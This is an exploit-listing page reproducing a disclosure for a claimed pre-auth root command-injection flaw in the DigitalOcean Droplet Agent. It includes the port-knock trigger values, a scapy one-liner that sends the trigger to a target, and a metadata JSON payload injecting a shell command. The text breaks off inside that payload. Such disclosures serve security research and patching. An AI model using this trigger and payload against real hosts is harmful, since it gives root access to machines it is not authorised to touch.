Share
## https://sploitus.com/exploit?id=4876C47D-D30D-598E-81A9-B15BF6F41F40
# CVE-2026-24516-DigitalOcean-RCE
Critical Pre-Auth Root RCE (CVSS 10.0) in DigitalOcean Droplet Agent up to v1.3.2 via Command Injection.
# CVE-2026-24516: Pre-Auth Root RCE in DigitalOcean Droplet Agent
 
## Overview
A critical command injection vulnerability was discovered in the **DigitalOcean Droplet Agent** (all versions up to and including **1.3.2**). This flaw allows an attacker to achieve **Remote Code Execution (RCE)** with **root privileges** without any authentication.

**Discoverer:** Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research

## Technical Details
The vulnerability exists in the troubleshooting actioner component:
- `internal/troubleshooting/actioner/actioner.go`
- `internal/troubleshooting/command/exec.go`

The agent processes metadata from the local service (`169.254.169.254`) and executes commands from the `TroubleshootingAgent.Requesting` array without proper sanitization.

### The Trigger (Port Knocking)
The agent is triggered by a specific TCP packet to port 22:
- **SeqNum:** 68796879
- **AckNum:** 848489

### Proof of Concept (PoC)
1. **Trigger the fetch:**
   `python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"`

2. **Malicious Metadata Payload:**
   ```json
   {
     "troubleshooting_agent": {
       "requesting": ["command:id > /tmp/pwned"]
     }
   }